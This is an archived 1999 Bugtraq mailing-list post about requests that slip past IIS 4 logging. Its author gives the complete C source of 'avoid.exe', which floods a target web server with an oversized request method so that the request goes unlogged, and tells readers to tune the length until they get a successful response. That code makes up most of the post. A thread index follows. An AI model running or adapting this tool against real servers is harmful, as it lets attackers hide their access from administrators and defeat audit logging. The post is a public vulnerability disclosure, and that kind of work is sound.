Bugtraq mailing list archives

Follow up - IIS 4 logging

From: mnemonix () GLOBALNET CO UK (mnemonix)
Date: Sat, 23 Jan 1999 15:52:02 -0000


There has been a mixed response to this problem - on some machines nothing
is logged and the page is returned, others get a 500 error and others log
the whole request.

From what I can make out:


Machines that first had IIS 3 then were upgraded to IIS 4 with the NT Option
Pack and  Service Pack 3 or 4 return the page and don't log.

Here is the source for avoid.exe as many have asked for it - for those that
get a 500 response back from the server play around with the request_method
length by increasing it until you get a 200ok response. It will chop and
change between 5xx, 4xx and 200 responses

Cheers,
David Litchfield
http://www.infowar.co.uk/mnemonix

-----------------------8<-----------------------------------------------

/* Compile with eg Visual C++ and link with wsock32.lib

#include <stdio.h>
#include <winsock2.h>
#include <string.h>


int main (int argc, char *argv[])
{
 int snd, rcv, err, portno,a=0,b, res;
 char resp[1024];
 WORD wVersionRequested;
 WSADATA wsaData;
 struct sockaddr_in sa;
 struct hostent *he;
 SOCKET sock;

 if (argc !=2)
  {
   printf("Usage:\nc:\\>%s target_machine\n\nDavid Litchfield\n21st January
1999\n", argv[0]);
   return 0;
  }
 wVersionRequested = MAKEWORD( 2, 0 );
 err = WSAStartup( wVersionRequested, &wsaData );

 if ( err != 0 )
  {
   printf("No winsock.dll\n");
   return 0;
  }
 if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 0 )
  {
       printf("No winsock.dll - 2nd\n");
       WSACleanup( );
       return 0;
  }

 if ((he = gethostbyname(argv[1])) == NULL)
  {
   printf("Invalid Host\n");
   return 0;
  }




 sock=socket(AF_INET,SOCK_STREAM,0);
 if (sock==INVALID_SOCKET)
  {
   printf("Invalid Socket!\n");
   return 0;
  }
 else
  {
   printf("");
  }

 sa.sin_addr.s_addr=INADDR_ANY;
 sa.sin_family=AF_INET;



 bind(sock,(struct sockaddr *)&sa,sizeof(sa));



 sa.sin_port=htons(80);

 memcpy(&sa.sin_addr,he->h_addr,he->h_length);
 if(connect(sock,(struct sockaddr *)&sa,sizeof(sa)) < 0)
  {
       printf("Failed to connect!\n");
  }
 else
  {

/* This loop creates the REQUEST_METHOD and makes it 10140 bytes long

   while (a < 10141)
    {
          snd=send(sock,"A", 1, 0);
     a ++;
    }
   snd=send(sock," /default.asp HTTP/1.0\n\n",43,0);
   rcv=recv(sock,resp,256,0);
   printf("\n%s",resp);
   rcv=recv(sock,resp,1024,0);
   printf("\n%s\n\n",resp);

    }


 closesocket(sock);

return 0;
}

----------------------------->8---------------------------------------------
-------------------------

Current thread:

Quake 2 Server Crash, (continued)
- Quake 2 Server Crash Leif Sawyer (Jan 20)
- NetBSD Security Advisory 1999-001: select(2)/accept(2) race D. J. Bernstein (Jan 20)
- Sendmail 8.8.x/8.9.x bugware Gregory Neil Shapiro (Jan 20)
  - CFP: New Security Paradigms Workshop 1999 Crispin Cowan (Jan 21)
  - Re: Sendmail 8.8.x/8.9.x bugware Phil Stracchino (Jan 21)
    - Re: Sendmail 8.8.x/8.9.x bugware Phil Stracchino (Jan 21)
    - linux crashes irix6.3 Philipp Schott (Jan 22)
    - Re: linux crashes irix6.3 J.A. Gutierrez (Jan 23)
    - CERT Advisory CA-99.01 - TCP.Wrappers (fwd) //Stany (Jan 22)
    - Misleading CERT Advisory CA-99-01-Trojan-TCP-Wrappers Jochen Thomas Bauer (Jan 22)
    - Follow up - IIS 4 logging mnemonix (Jan 23)
- WebRamp M3 remote network access bug John Stanley (Jan 21)
  - Re: WebRamp M3 remote network access bug James Egelhof (Jan 21)
  - Perl.exe and IIS security advisory mnemonix (Jan 22)
    - Re: Perl.exe and IIS security advisory Tabor J. Wells (Jan 24)
    - Repost: Wietse's FTP site has moved Wietse Venema (Jan 25)
    - Using Example Domain Names in Exploits bandregg () REDHAT COM (Jan 25)
    - IIS Advisory Update Marc (Jan 24)
- backdoored tcp wrapper source code Wietse Venema (Jan 21)
  - Re: backdoored tcp wrapper source code John Stange (Jan 23)
    - SSH 1.x and 2.x Daemon KuRuPTioN (Jan 23)

(Thread continues...)